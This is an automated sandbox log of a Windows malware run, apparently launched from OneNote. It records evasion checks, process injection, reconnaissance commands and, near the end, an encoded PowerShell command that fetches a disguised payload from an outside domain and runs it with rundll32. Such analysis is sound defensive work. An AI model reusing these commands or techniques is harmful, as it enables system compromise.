Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\whoami.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\whoami.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: backgroundTaskHost.exe, 0000000F.00000003.33999517623.00000000046BB000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000000F.00000003.33969603865.00000000046BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: backgroundTaskHost.exe, 0000000F.00000003.33999517623.00000000046BB000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000000F.00000003.33969603865.00000000046BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROC_ANALYZER.EXE

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status from Win32_PnPEntity

Renames NTDLL to bypass HIPS

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\ntdll.dll			Jump to behavior

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDrive

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_Bios

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1068	Thread sleep count: 7184 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 8386 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4480	Thread sleep count: 144 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 1740	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 7312	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7184			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8386			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_14-37675

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_ComputerSystem

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: NETSTAT.EXE, 00000021.00000002.36176808890.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: ARP.EXE, 00000018.00000002.36164647093.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 0000001F.00000002.36174502522.0000000002C99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: net1.exe, 00000025.00000002.36179945069.00000000031F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000AFB9 GetSystemInfo,

14_2_1000AFB9

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000C547 FindFirstFileW,FindNextFileW,

14_2_1000C547

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000970D LoadLibraryA,GetProcAddress,

14_2_1000970D

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_3_047D222E mov eax, dword ptr fs:[00000030h]	14_3_047D222E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_693417F4 mov eax, dword ptr fs:[00000030h]	14_2_693417F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_100010A0 mov eax, dword ptr fs:[00000030h]	14_2_100010A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_100026E5 mov eax, dword ptr fs:[00000030h]	14_2_100026E5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_693720E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		14_2_693720E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_693720DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		14_2_693720DC

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: unknown target: C:\Windows\SysWOW64\backgroundTaskHost.exe protection: execute and read and write

Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 750000 protect: page read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 750000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: E71790			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl3n0yxjjb21wdxrhzg9yyxmuy29tl2x0mmvmttyvmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl3n0yxjjb21wdxrhzg9yyxmuy29tl2x0mmvmttyvmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg=='))			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net view	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c set	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net share	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE route print	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /all	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 share	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,CoInitializeEx,Sleep,	14_2_1000169F
